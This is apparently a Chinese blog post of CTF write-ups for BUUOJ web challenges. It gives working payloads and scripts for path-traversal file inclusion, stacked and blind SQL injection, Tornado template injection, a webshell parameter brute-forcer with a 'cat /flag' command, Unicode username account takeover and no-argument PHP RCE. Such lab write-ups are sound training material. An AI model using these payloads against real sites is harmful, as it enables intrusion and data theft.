Ctf
17 Oct 2019

buuoj-从Web到去世

buuoj-从Web到去世

[HCTF 2018]WarmUp

开局一滑稽,看源码找到source.php,进去拿到源码

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

发现有个hint.php,进去看看

flag not here, and flag in ffffllllaaaagggg

文件包含,根据白名单,可以包含

http://cd9db9a0-af20-4d93-a66b-4ad9ddd2e0c4.node3.buuoj.cn/index.php?file=hint.php
http://cd9db9a0-af20-4d93-a66b-4ad9ddd2e0c4.node3.buuoj.cn/index.php?file=source.php

成功包含需要满足三个条件

  1. $_REQUEST['file']不为空
  2. $_REQUEST['file']是字符串
  3. $_REQUEST['file']满足check
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

用问号分割,取出字符串开头到第一个问号直接的字符串与白名单比较

payload

?file=source.php?/../../../../../ffffllllaaaagggg

./ 当前目录 ../ 上一级目录

[SUCTF 2019]EasySQL

  • 非预期解

    *,1

随便注

堆叠注入

输入select,被过滤

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

查表

1';show tables;

array(2) {
  [0]=>
  string(1) "1"
  [1]=>
  string(7) "hahahah"
}

array(1) {
  [0]=>
  string(16) "1919810931114514"
}

array(1) {
  [0]=>
  string(5) "words"
}

flag在1919810931114514

用concat拼接绕过过滤,查flag,set保存flag,然后execute

1';
SET @a=concat("sel","ect flag from `1919810931114514`");
PREPARE fuck from @a;
execute fuck;

easy_tornado

/flag.txt
flag in /fllllllllllllag
/welcome.txt
render
/hints.txt
md5(cookie_secret+md5(filename))

http://47cb66a8-02e8-4e15-ae66-2d14c45521f8.node3.buuoj.cn/file?filename=/hints.txt&filehash=1153333b8be335fadb7d29f4ca1d96bc

找cookie_secret算filehash

渲染函数render(),文件全部在网页上

用错误的filehash试一下

http://47cb66a8-02e8-4e15-ae66-2d14c45521f8.node3.buuoj.cn/file?filename=/fllllllllllllag

报error

http://47cb66a8-02e8-4e15-ae66-2d14c45521f8.node3.buuoj.cn/error?msg=Error

尝试

http://47cb66a8-02e8-4e15-ae66-2d14c45521f8.node3.buuoj.cn/error?msg=1

出一个1

SSTI,服务器模板注入,查tornado,发现有个handler.settings

http://47cb66a8-02e8-4e15-ae66-2d14c45521f8.node3.buuoj.cn/error?msg=

{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': 'b47f8947-9982-44df-8db8-8c85856ab61f'}

拿到cookie_secret

<?php
$cookie_secret = 'b47f8947-9982-44df-8db8-8c85856ab61f';
$filename = '/fllllllllllllag';
echo '?filename=/fllllllllllllag&filehash='.md5($cookie_secret.md5($filename));
?>

http://47cb66a8-02e8-4e15-ae66-2d14c45521f8.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=08042157060a8acab29dde01ff6ddde8

[强网杯 2019]高明的黑客

雁过留声,人过留名,此网站已被黑
我也是很佩服你们公司的开发,特地备份了网站源码到www.tar.gz以供大家观赏

下载源码,3002个文件,看不懂

站被日了,文件里必有马

本地跑,找到一个能用的然后cat flag

import os
import requests

path = "/var/www/html/src/"
url = "http://127.0.0.1/src/"
files = os.listdir(path)

def search_get(f):
    gets = []
    with open(path+f, 'r') as f:
        for line in f.readlines():
            if "$_GET['" in line:
                start = line.find("$_GET['") + len("$_GET['")
                end = line.find("'", start)
                gets.append('?'+line[start:end]+'=')
    return gets

for i in range(0,len(files)):
    filename = 'xk0SzyKwfzw.php'
    #filename = files[i]
    gets = search_get(filename)
    for get in gets:
        fuck = url+filename+get+'echo wdnmd'
        r = requests.get(fuck)
        if 'wdnmd' in r.content:
            print(fuck)


http://ab3232d1-e24e-495a-a1fb-81b3632d4638.node3.buuoj.cn/xk0SzyKwfzw.php?Efa5BVG=cat%20/flag

[HCTF 2018]admin

注册、登陆、改密码

改密码查看源码发现源码白给

https://github.com/woadsl1234/hctf_flask/

@app.route('/register', methods = ['GET', 'POST'])
def register():

    if current_user.is_authenticated:
        return redirect(url_for('index'))

    form = RegisterForm()
    if request.method == 'POST':
        name = strlower(form.username.data)
        if session.get('image').lower() != form.verify_code.data.lower():
            flash('Wrong verify code.')
            return render_template('register.html', title = 'register', form=form)
        if User.query.filter_by(username = name).first():
            flash('The username has been registered')
            return redirect(url_for('register'))
        user = User(username=name)
        user.set_password(form.password.data)
        db.session.add(user)
        db.session.commit()
        flash('register successful')
        return redirect(url_for('login'))
    return render_template('register.html', title = 'register', form = form)

def login():
    if current_user.is_authenticated:
        return redirect(url_for('index'))

    form = LoginForm()
    if request.method == 'POST':
        name = strlower(form.username.data)
        session['name'] = name
        user = User.query.filter_by(username=name).first()
        if user is None or not user.check_password(form.password.data):
            flash('Invalid username or password')
            return redirect(url_for('login'))
        login_user(user, remember=form.remember_me.data)
        return redirect(url_for('index'))
    return render_template('login.html', title = 'login', form = form)

@app.route('/change', methods = ['GET', 'POST'])
def change():
    if not current_user.is_authenticated:
        return redirect(url_for('login'))
    form = NewpasswordForm()
    if request.method == 'POST':
        name = strlower(session['name'])
        user = User.query.filter_by(username=name).first()
        user.set_password(form.newpassword.data)
        db.session.commit()
        flash('change successful')
        return redirect(url_for('index'))
    return render_template('change.html', title = 'change', form = form)

注册,登陆,改密码里面都有一个转换小写的函数

def strlower(username):
    username = nodeprep.prepare(username)
    return username

若username为ᴬᴰᴹᴵᴺ,转换后username为ADMIN

注册ᴬᴰᴹᴵᴺ,登陆后为ADMIN,修改ADMIN密码,也就修改了admin的密码

然后登陆admin

[CISCN2019 华北赛区 Day2 Web1]Hack World

绕一下空格,布尔盲注

import requests
url = 'http://1401d5e8-82c2-4f85-b8ea-822ffa8c6116.node3.buuoj.cn/index.php'
flag = ''
for x in range(1, 100):
	high = 127
	low = 32
	mid = (low + high) // 2
	while high > low:
		payload = 'if(ascii(substr((select\tflag\tfrom\tflag),{},1))>{},1,2)'.format(x, mid)
		data = {'id':payload}
		r = requests.post(url, data = data)
		if 'Hello' in r.text:
			low = mid + 1
		else:
			high = mid
		mid = (low + high) // 2
	flag += chr(int(mid))
	print(flag)
	if flag.endswith('}'):
		break

[GXYCTF2019]禁止套娃

githack拿源码

无参RCE

?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

[极客大挑战 2019]EasySQL

admin' or 1#

[极客大挑战 2019]Havefun

f12

                <!--
        $cat=$_GET['cat'];
        echo $cat;
        if($cat=='dog'){
            echo 'Syc{cat_cat_cat_cat}';
        }
        -->
Tags:
0 comments



本作品采用知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议CC BY-NC-ND 4.0)进行许可。

This work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License (CC BY-NC-ND 4.0).